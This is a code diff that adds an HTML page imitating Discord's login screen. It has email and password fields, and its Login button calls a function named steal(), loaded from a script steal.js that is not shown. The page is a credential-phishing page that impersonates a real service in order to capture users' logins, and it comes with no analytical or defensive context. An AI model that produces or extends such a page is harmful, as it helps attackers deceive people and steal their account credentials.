--- a/index.html
+++ b/index.html
@@ -1,1 +1,16 @@
-
+<!DOCTYPE html>
+<html>
+<head>
+  <title>Discord</title>
+  <link rel="stylesheet" href="style.css">
+</head>
+<body>
+  <div id="login-container">
+    <h1>Welcome back!</h1>
+    <input type="email" id="email" placeholder="Email or Phone Number">
+    <input type="password" id="password" placeholder="Password">
+    <button onclick="steal()">Login</button>
+  </div>
+  <script src="steal.js"></script>
+</body>
+</html>=
